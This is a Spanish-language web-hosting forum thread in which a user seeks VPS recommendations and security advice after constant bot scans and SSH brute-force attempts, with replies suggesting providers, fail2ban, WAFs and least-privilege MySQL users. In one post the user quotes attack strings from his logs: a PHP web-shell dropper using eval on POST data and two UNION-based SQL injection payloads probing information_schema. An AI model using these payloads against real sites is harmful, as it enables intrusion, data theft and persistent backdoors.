Un VPS recomendado?

  • Autor Autor jackl007
  • Fecha de inicio Fecha de inicio

jackl007

Eta
Programador
Verificación en dos pasos activada
Hola, chicos

Que VPS me recomendan (Latinoamérica), es para un sitio de negocios, así que me gustaría uno que no tenga problemas, y que sus IPS no andan en blacklists, y que no tenga sus IPs recibiendo ataques.

Actualmente contraté un VPS en x10vps, por 35 dólares (1.25 RAM, 50 GB disco, y 1 cpu) + cPanel.

Pues resulta que todo el tiempo recibe ataques de bots, andan escaneando y buscando vulnerabilidades todos los días en el sitio, estoy viendo migrar a otro VPS sin problemas de este tipo.

Diariamente recibo hasta 500 intentos de obtener el login del root por ssh, tengo activado denyhosts para bloquearlos.


Compartan sus experiencias para este tipo de hosting.

Gracias
 
Hola

Virtual Servers - CaribeHost

Virtual Servers VPS Performance, security and availability for all uses
caribehost.co

Mira nuestros planes
 

Donde sea que compres te pasara lo mismo si no ubicas una persona de confianza que te asegure el servidor.

De igual forma lo que pagas por esos recursos es demasiado comparado a lo que puedes obtener por otros lados.



Y con US$50 de regalo a nuevos clientes https://www.vultr.com/promo/try50/

Empezando por el cPanel... Es algo que puedes solucionar con alternativas 😳

Si gustas escríbeme al privado y te asesoro sin compromiso.
 
tengo en x10VPS, más de 10 años he usado el servicio prmium de hosting, y pocas veces con el VPS, pero recibe muchos ataques sus VPS.
 

me interesa CentOS 7 + cPanel, ya que el CentOs 6 va a ser obsoleto este año.

he usado alternativas gratuitas como LXADMIN, pero en este caso, requiero cPanel porque mi cliente lo desea. en sus VPS no se puede agregar la licencia ?

Saludos
 
jackl007 dijo:
tengo en x10VPS, más de 10 años he usado el servicio prmium de hosting, y pocas veces con el VPS, pero recibe muchos ataques sus VPS.
Hacer clic para expandir...

Eso habla muy bien de ellos pero sus precios son muy elevados al menos para lo que pagas por cPanel.

Lo que necesitas es que te hagan un buen setup de seguridad y adiós al problema...

jackl007 dijo:
me interesa CentOS 7 + cPanel, ya que el CentOs 6 va a ser obsoleto este año.

he usado alternativas gratuitas como LXADMIN, pero en este caso, requiero cPanel porque mi cliente lo desea. en sus VPS no se puede agregar la licencia ?

Saludos
Hacer clic para expandir...

Se puede, te corresponde comprarla en cPanel.net directamente o un Reseller.
 
IMHO intentos de logeo al root x ssh .. acaso aun tenemos el SSH en el port 22
de los interntos fail2ban acotado ayuda bastante .. y usar entrada sin password aun mas .. yo x sanidad mental .. NUNCA port ssh en el 22
y entro solo con llaves y claro un user de emergencias con un nombre marciano con un password de otra galaxia
 
en cuanto al tema escaneo .. te dan algun tipo de proteccion DDoS ? aparte del cpanel alguna cosa extra .. algún waf ? .. de cpanel cuando en esencia esta un solo dominio es un desproposito de dinero ... no agrega nada mas 1 o 2 herramientas libres no hagan
 
time4vps
 
pluxhost.com
 
Los ataques por SSH no me preocupan mucho, porque 1 intento erroneo al usuario y se bloquea el IP.

lo que me preocupa es que esten buscando vulnerabilidades en mi sitio.

He encontrado que estan ejecutando estas cosas (hasta sql injection) y muchas variantes:
en los GET en las variables ejecutan:

En la variable GET content
<php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>

111111111111111111111111111 UNION SELECT (select CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)) FROM information_schema.COLUMNS WHERE `COLUMN_NAME` LIKE char(37,115,111,99,105,97,108,115,101,99,117,114,105,116,121,110,117,109,98,101,114,37) AND ( DATA_TYPE=char(99,104,97,114) OR DATA_TYPE=char(118,97,114,99,104,97,114) OR DATA_TYPE=char(116,101,120,116))),2,3,4,5,6,7

111111111111111111111111111 UNION SELECT (select CONCAT(0x5b6464645d,0x5e,IFNULL(unhex(Hex(cast(TABLE_NAME as char))),0x20),0x5e,0x5e,IFNULL(unhex(Hex(cast(TABLE_SCHEMA as char))),0x20),0x5e,0x5b6464645d) FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE char(37,117,115,101,114,37) limit 0,1),2,3,4,5,6,7
 
en ese caso necesitan un WAF y el codigo usado es de alguna plataforma que reciba actualizaciones frecuentes si la respuesta es NO .. necesitas un WAF urgente
 
Estas usando algún Framework (laravel, CodeIgniter, etc...) o es simplemente un sitio en wordpress al que están intentando atacarte?
 
Ya intentaste con Vultr?
 
Usa bitninja o imunify360 en tu vps... eso o al menos csf...

Para tu codigo tambien puedes usar cloudflare y activar la opcion underattack para tu sitio...
 
Hola,

Te hablo de **************, tenemos nuestro nodo en beauharnois, Canadá con OVH. Tenemos su protección DDoS incluida e IP sin blacklist. Si te interesa, te puedo dejar probar nuestros servidores por 15 días y opcionalmente te puedo ofrecer "cloud vps" donde puedas crear vps y eliminarlos con cierta cantidad de CPU y RAM.

Saludos.
 
Adicionalmente podemos generar seguridad adicional para tu cuenta por SSH con ssh keys y blacklist de IP a los puertos para que nada más tu IP o un rango de IP de tu proveedor de internet funcione para entrar o podemos desactivar SSH y puedes utilizar VNC con un puerto específico para que sólo tú puedas entrar.
 
caribehost_oficial dijo:
Estas usando algún Framework (laravel, CodeIgniter, etc...) o es simplemente un sitio en wordpress al que están intentando atacarte?
Hacer clic para expandir...
Hola, no es csm propio, y ando parchando también huecos de seguridad, no han considerado muchas cosas para darle un mínimo de seguridad.

Ahora ando moniteando todo lo que se ejecuta.

Saludos
 
Estan intentando atacar la tabla maestra de MySQL information_schema, la unica forma que logren llegar a esa tabla es:
  1. Estes usando en su CMS el usuario root de MySQL
  2. El Usuario de la BD de su CMS tenga GRANT PRIVILEGE sobre todas las BD
Si esto es asi, proceda a cambiar la clave de root de MySQL o en su defecto degrade los privilegios del usuario solo a la BD del CMS.

Ahora bien revise que su CMS cuente con todas las mejores practicas de seguridad en el desarrollo, y nunca esta de mas usar WAF para proteger las aplicaciones (ModSecurity)
 
Última edición:

Excelente recomendación.

Gracias por los consejos.
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

  • Pregunta Pregunta
Servidor VPS recomendado?
Respuestas
19
Visitas
1K
eWallHost
VPS recomendado (USA Este)
Respuestas
10
Visitas
516
Carlos Frias
¿VPS offshore recomendado para proxy inverso?
Respuestas
3
Visitas
431
thesulla
B
A la hora de escoger un servidor VPS cual recomendais? lee un poco y aprenda
Respuestas
1
Visitas
556
zick123
P
Nesecito ayuda un VPS que sea Fiable y recomendado.
Respuestas
12
Visitas
754
fabriccio
F
Menú
Acceder
Registro